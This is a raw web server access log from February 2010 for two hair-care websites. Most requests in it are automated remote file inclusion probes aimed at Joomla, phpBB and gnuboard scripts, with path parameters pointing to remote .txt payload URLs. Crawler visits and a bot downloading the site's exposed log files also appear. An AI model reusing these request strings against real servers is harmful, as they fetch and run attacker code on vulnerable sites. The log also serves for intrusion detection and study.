202.133.244.22 - - [15/Feb/2010:07:22:09 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.213 - - [15/Feb/2010:07:24:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [15/Feb/2010:07:24:53 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
220.181.94.213 - - [15/Feb/2010:07:25:04 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7697 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
220.181.94.213 - - [15/Feb/2010:07:27:26 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7697 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
174.142.61.173 - - [15/Feb/2010:07:29:26 -0800] "GET /logs/access_100125.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.102.63.60 - - [15/Feb/2010:07:30:02 -0800] "GET / HTTP/1.0" 200 910 "http://aimtrust.com/aim/r/60008" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "www.freehairsecrets.com"
174.142.61.173 - - [15/Feb/2010:07:32:49 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.239.230.130 - - [15/Feb/2010:07:35:30 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:07:35:30 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
61.100.181.217 - - [15/Feb/2010:07:39:14 -0800] "GET /functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.100.181.217 - - [15/Feb/2010:07:39:14 -0800] "GET /logs//functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.100.181.217 - - [15/Feb/2010:07:39:16 -0800] "GET /logs/access.log//functions_admin.php?phpbb_root_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:07:39:55 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:07:39:55 -0800] "GET /write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:07:39:55 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:07:39:56 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:07:39:56 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:07:39:56 -0800] "GET /write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [15/Feb/2010:07:43:25 -0800] "GET /tmp/mailError.log HTTP/1.1" 200 62167 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.239.230.130 - - [15/Feb/2010:07:47:33 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:07:47:33 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
220.80.108.81 - - [15/Feb/2010:07:48:25 -0800] "GET /write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:07:48:25 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [15/Feb/2010:07:48:25 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.111.3.35 - - [15/Feb/2010:07:48:41 -0800] "GET /logs/access.log//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.freehairsecrets.com"
61.111.3.35 - - [15/Feb/2010:07:48:47 -0800] "GET /logs//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.freehairsecrets.com"
61.111.3.35 - - [15/Feb/2010:07:48:47 -0800] "GET /gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:07:49:29 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:07:49:29 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:07:49:29 -0800] "GET /write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:07:49:47 -0800] "GET /write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:07:49:47 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:07:49:47 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.179.6 - - [15/Feb/2010:07:56:56 -0800] "GET /logs///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.163.179.6 - - [15/Feb/2010:07:56:56 -0800] "GET /logs/access_091214.log%20%20///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.163.179.6 - - [15/Feb/2010:07:56:57 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:00:17 -0800] "GET /logs///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:00:17 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:00:20 -0800] "GET /logs/access_091214.log%20%20///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:00:48 -0800] "GET /logs///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:00:48 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:00:51 -0800] "GET /logs/access_091214.log%20%20///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:01:10 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:01:10 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:01:12 -0800] "GET /logs/access_100125.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:08:01:51 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:08:01:51 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:02:03 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:02:03 -0800] "GET /logs/access_100125.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:02:04 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
173.165.1.69 - - [15/Feb/2010:08:02:06 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.165.1.69 - - [15/Feb/2010:08:02:21 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.179.6 - - [15/Feb/2010:08:05:20 -0800] "GET /logs/access_091214.log///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:07:45 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:07:45 -0800] "GET /logs/access_100125.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:07:45 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:07:46 -0800] "GET /logs/access_100125.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:07:46 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:07:46 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [15/Feb/2010:08:08:25 -0800] "GET /logs/access_091214.log///includes/functions_portal.php?phpbb_root_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:11:21 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:11:21 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:11:21 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:13:10 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:13:10 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.186.154 - - [15/Feb/2010:08:13:11 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:15:24 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:15:30 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:15:30 -0800] "GET /logs/access_091123.log//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.7.235.75 - - [15/Feb/2010:08:15:36 -0800] "GET /logs/access_091214.log/bbs/skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:15:38 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:15:38 -0800] "GET /logs/access_091123.log//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:15:44 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.246.80 - - [15/Feb/2010:08:15:56 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.246.80 - - [15/Feb/2010:08:15:56 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.246.80 - - [15/Feb/2010:08:15:56 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:16:17 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:16:17 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.172.236.41 - - [15/Feb/2010:08:16:22 -0800] "GET /logs/access_091123.log//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.43 - - [15/Feb/2010:08:18:12 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
189.6.218.57 - - [15/Feb/2010:08:19:01 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.6.218.57 - - [15/Feb/2010:08:19:01 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
189.6.218.57 - - [15/Feb/2010:08:19:01 -0800] "GET /delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:08:20:25 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:08:20:25 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:08:20:25 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:01 -0800] "HEAD /logs/ HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:01 -0800] "GET /logs/ HTTP/1.1" 200 4799 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:16 -0800] "HEAD /logs/access.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:17 -0800] "GET /logs/access.log HTTP/1.1" 206 368101 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:17 -0800] "HEAD /logs/access_090810.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:18 -0800] "HEAD /logs/access_090817.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:18 -0800] "HEAD /logs/access_090824.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:18 -0800] "HEAD /logs/access_090831.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:18 -0800] "HEAD /logs/access_090907.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:18 -0800] "HEAD /logs/access_090914.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:19 -0800] "HEAD /logs/access_090921.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:19 -0800] "HEAD /logs/access_090928.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:19 -0800] "HEAD /logs/access_091005.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:19 -0800] "HEAD /logs/access_091012.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:19 -0800] "HEAD /logs/access_091019.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:20 -0800] "HEAD /logs/access_091026.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:20 -0800] "HEAD /logs/access_091102.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:20 -0800] "HEAD /logs/access_091109.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:20 -0800] "HEAD /logs/access_091116.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:21 -0800] "HEAD /logs/access_091123.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:21 -0800] "HEAD /logs/access_091130.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:21 -0800] "HEAD /logs/access_091207.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:21 -0800] "HEAD /logs/access_091214.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:21 -0800] "HEAD /logs/access_091221.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:22 -0800] "HEAD /logs/access_091228.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:22 -0800] "HEAD /logs/access_100104.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:22 -0800] "HEAD /logs/access_100111.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:22 -0800] "HEAD /logs/access_100118.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:22 -0800] "HEAD /logs/access_100125.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:23 -0800] "HEAD /logs/access_100201.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:23 -0800] "HEAD /logs/access_100208.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:23 -0800] "HEAD /logs/access_100215.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:30 -0800] "GET /logs/access_100215.log HTTP/1.1" 206 3655063 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [15/Feb/2010:08:22:31 -0800] "HEAD /logs/scripts.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:23:43 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:23:43 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:08:23:43 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4808 "-" "Mozilla/5.0" "growlonghairfast.com"
